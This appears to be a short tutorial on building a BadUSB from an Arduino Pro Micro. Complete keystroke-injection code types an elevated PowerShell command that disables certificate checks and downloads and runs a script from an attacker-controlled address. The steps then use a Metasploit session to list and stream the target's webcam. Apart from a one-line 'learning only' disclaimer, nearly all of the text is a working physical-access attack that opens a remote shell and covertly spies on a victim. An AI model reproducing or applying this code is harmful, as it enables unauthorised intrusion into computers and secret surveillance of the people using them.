statement
This article is only used for learning and communication, do not do any illegal behavior
Material preparation
- One badusb, I used Arduino Pro Micro (Atmega32U4) modified
- kail linux system PC
- win10 system PC
Kail linux edge
- Download the payload generation script
git clone https://github.com/christofersimbar/Arduino-Reverse-Shell-Generator.git
cd Arduino-Reverse-Shell-Generator
sudo ruby reverse_powershell_arduino.rb
- Enter the local ip and custom port, press Enter all the way to generate the script for Arduino burning
- Script for Arduino burning (modify the ip address in the url by yourself)
#include <Keyboard.h>
void typeKey(int key) {
Keyboard.press(key);
delay(500);
Keyboard.release(key);
}
void setup()
{
Keyboard.begin();
Keyboard.press(KEY_LEFT_GUI);
delay(1000);
Keyboard.press('x');
Keyboard.releaseAll();
delay(500);
typeKey('a');
delay(100);
Keyboard.press(KEY_LEFT_ALT);
delay(500);
Keyboard.press('y');
Keyboard.releaseAll();
delay(800);
Keyboard.print("[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('http://192.168.88.102/shell.txt')");
typeKey(KEY_RETURN);
Keyboard.end();
}
void loop() {}
- Burn the script into Arduino to complete the badusb production
PC side of win10 system
- Insert badusb, the script will be executed automatically
Control webcam of win10 system PC
- Back in kail linux, you can see that the win10 system PC has been connected
- Execute:
sessions -i 1
enter the target system - Execute:
webcam_list
scan for available webcams - Execute:
webcam_stream 1
Open the target's webcam No. 1 - The result can be observed in the browser